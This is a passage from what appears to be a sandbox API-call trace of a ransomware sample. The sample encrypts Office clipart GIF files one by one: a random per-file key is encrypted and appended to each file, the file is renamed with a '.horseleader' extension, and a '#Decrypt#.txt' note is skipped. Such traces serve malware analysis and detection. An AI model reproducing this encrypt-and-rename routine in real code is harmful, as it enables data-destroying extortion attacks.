hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.524] CloseHandle (hObject=0x158) returned 1 [0252.524] GetProcessHeap () returned 0x780000 [0252.524] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.524] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF.horseleader") returned 79 [0252.524] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00165_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00165_.gif.horseleader")) returned 1 [0252.525] GetProcessHeap () returned 0x780000 [0252.525] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.526] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81614600, ftCreationTime.dwHighDateTime=0x1bd4c12, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x81614600, ftLastWriteTime.dwHighDateTime=0x1bd4c12, nFileSizeHigh=0x0, nFileSizeLow=0x131e, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00167_.GIF", cAlternateFileName="")) returned 1 [0252.526] lstrcmpiW (lpString1="AG00167_.GIF", lpString2="Windows") returned -1 [0252.526] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 67 [0252.526] StrStrIW (lpFirst="AG00167_.GIF", lpSrch=".horseleader") returned 0x0 [0252.526] lstrcmpW (lpString1="AG00167_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.526] lstrcmpW (lpString1="AG00167_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.526] lstrlenW (lpString=".testttjffg") returned 11 [0252.526] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.526] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.526] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.526] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00167_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.527] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 67 [0252.527] StrStrW (lpFirst="AG00167_.GIF", lpSrch=".txt") returned 0x0 [0252.527] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=4894) returned 1 [0252.527] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x131e, lpOverlapped=0x0) returned 1 [0252.530] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffece2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.530] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x131e, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x131e, lpOverlapped=0x0) returned 1 [0252.530] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.530] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.530] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.531] CloseHandle (hObject=0x158) returned 1 [0252.531] GetProcessHeap () returned 0x780000 [0252.531] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.531] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF.horseleader") returned 79 [0252.531] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00167_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00167_.gif.horseleader")) returned 1 [0252.532] GetProcessHeap () returned 0x780000 [0252.532] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.532] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c9c9200, ftCreationTime.dwHighDateTime=0x1bd4c12, ftLastAccessTime.dwLowDateTime=0x5eb686b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7c9c9200, ftLastWriteTime.dwHighDateTime=0x1bd4c12, nFileSizeHigh=0x0, nFileSizeLow=0x14ff, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00169_.GIF", cAlternateFileName="")) returned 1 [0252.532] lstrcmpiW (lpString1="AG00169_.GIF", lpString2="Windows") returned -1 [0252.532] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 67 [0252.532] StrStrIW (lpFirst="AG00169_.GIF", lpSrch=".horseleader") returned 0x0 [0252.532] lstrcmpW (lpString1="AG00169_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.532] lstrcmpW (lpString1="AG00169_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.532] lstrlenW (lpString=".testttjffg") returned 11 [0252.532] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.533] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.533] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.533] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00169_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.533] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 67 [0252.533] StrStrW (lpFirst="AG00169_.GIF", lpSrch=".txt") returned 0x0 [0252.533] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=5375) returned 1 [0252.533] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x14ff, lpOverlapped=0x0) returned 1 [0252.540] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffeb01, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.540] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x14ff, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x14ff, lpOverlapped=0x0) returned 1 [0252.540] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.540] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.540] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.540] CloseHandle (hObject=0x158) returned 1 [0252.541] GetProcessHeap () returned 0x780000 [0252.541] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.541] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF.horseleader") returned 79 [0252.541] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00169_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00169_.gif.horseleader")) returned 1 [0252.542] GetProcessHeap () returned 0x780000 [0252.542] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.542] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76a6b100, ftCreationTime.dwHighDateTime=0x1bd4c12, ftLastAccessTime.dwLowDateTime=0x51317770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x76a6b100, ftLastWriteTime.dwHighDateTime=0x1bd4c12, nFileSizeHigh=0x0, nFileSizeLow=0x2420, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00170_.GIF", cAlternateFileName="")) returned 1 [0252.542] lstrcmpiW (lpString1="AG00170_.GIF", lpString2="Windows") returned -1 [0252.542] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 67 [0252.542] StrStrIW (lpFirst="AG00170_.GIF", lpSrch=".horseleader") returned 0x0 [0252.542] lstrcmpW (lpString1="AG00170_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.542] lstrcmpW (lpString1="AG00170_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.543] lstrlenW (lpString=".testttjffg") returned 11 [0252.543] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.543] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.543] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.543] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00170_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.544] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 67 [0252.544] StrStrW (lpFirst="AG00170_.GIF", lpSrch=".txt") returned 0x0 [0252.544] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=9248) returned 1 [0252.544] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2420, lpOverlapped=0x0) returned 1 [0252.546] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffdbe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.546] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2420, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2420, lpOverlapped=0x0) returned 1 [0252.547] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.547] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.547] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.547] CloseHandle (hObject=0x158) returned 1 [0252.547] GetProcessHeap () returned 0x780000 [0252.547] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.547] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF.horseleader") returned 79 [0252.547] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00170_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00170_.gif.horseleader")) returned 1 [0252.548] GetProcessHeap () returned 0x780000 [0252.548] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.548] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71e1fd00, ftCreationTime.dwHighDateTime=0x1bd4c12, ftLastAccessTime.dwLowDateTime=0x51317770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x71e1fd00, ftLastWriteTime.dwHighDateTime=0x1bd4c12, nFileSizeHigh=0x0, nFileSizeLow=0x1398, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00171_.GIF", cAlternateFileName="")) returned 1 [0252.548] lstrcmpiW (lpString1="AG00171_.GIF", lpString2="Windows") returned -1 [0252.548] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 67 [0252.548] StrStrIW (lpFirst="AG00171_.GIF", lpSrch=".horseleader") returned 0x0 [0252.549] lstrcmpW (lpString1="AG00171_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.549] lstrcmpW (lpString1="AG00171_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.549] lstrlenW (lpString=".testttjffg") returned 11 [0252.549] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.549] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.549] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.549] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00171_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.550] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 67 [0252.550] StrStrW (lpFirst="AG00171_.GIF", lpSrch=".txt") returned 0x0 [0252.550] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=5016) returned 1 [0252.550] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1398, lpOverlapped=0x0) returned 1 [0252.553] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffec68, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.553] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1398, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1398, lpOverlapped=0x0) returned 1 [0252.554] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.554] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.554] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.554] CloseHandle (hObject=0x158) returned 1 [0252.554] GetProcessHeap () returned 0x780000 [0252.554] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.554] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF.horseleader") returned 79 [0252.555] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00171_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00171_.gif.horseleader")) returned 1 [0252.556] GetProcessHeap () returned 0x780000 [0252.556] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.556] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a04e500, ftCreationTime.dwHighDateTime=0x1bd4e61, ftLastAccessTime.dwLowDateTime=0x5eb686b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2a04e500, ftLastWriteTime.dwHighDateTime=0x1bd4e61, nFileSizeHigh=0x0, nFileSizeLow=0x1126, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00172_.GIF", cAlternateFileName="")) returned 1 [0252.556] lstrcmpiW (lpString1="AG00172_.GIF", lpString2="Windows") returned -1 [0252.556] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 67 [0252.556] StrStrIW (lpFirst="AG00172_.GIF", lpSrch=".horseleader") returned 0x0 [0252.556] lstrcmpW (lpString1="AG00172_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.556] lstrcmpW (lpString1="AG00172_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.556] lstrlenW (lpString=".testttjffg") returned 11 [0252.556] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.556] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.556] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.557] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00172_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.558] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 67 [0252.558] StrStrW (lpFirst="AG00172_.GIF", lpSrch=".txt") returned 0x0 [0252.558] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=4390) returned 1 [0252.558] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1126, lpOverlapped=0x0) returned 1 [0252.561] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffeeda, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.561] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1126, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1126, lpOverlapped=0x0) returned 1 [0252.561] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.561] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.561] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.562] CloseHandle (hObject=0x158) returned 1 [0252.562] GetProcessHeap () returned 0x780000 [0252.562] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.562] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF.horseleader") returned 79 [0252.562] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00172_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00172_.gif.horseleader")) returned 1 [0252.563] GetProcessHeap () returned 0x780000 [0252.563] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.563] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde4d3e00, ftCreationTime.dwHighDateTime=0x1bd4e56, ftLastAccessTime.dwLowDateTime=0x51317770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xde4d3e00, ftLastWriteTime.dwHighDateTime=0x1bd4e56, nFileSizeHigh=0x0, nFileSizeLow=0xf7e, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00174_.GIF", cAlternateFileName="")) returned 1 [0252.564] lstrcmpiW (lpString1="AG00174_.GIF", lpString2="Windows") returned -1 [0252.564] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 67 [0252.564] StrStrIW (lpFirst="AG00174_.GIF", lpSrch=".horseleader") returned 0x0 [0252.564] lstrcmpW (lpString1="AG00174_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.564] lstrcmpW (lpString1="AG00174_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.564] lstrlenW (lpString=".testttjffg") returned 11 [0252.564] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.564] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.564] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, 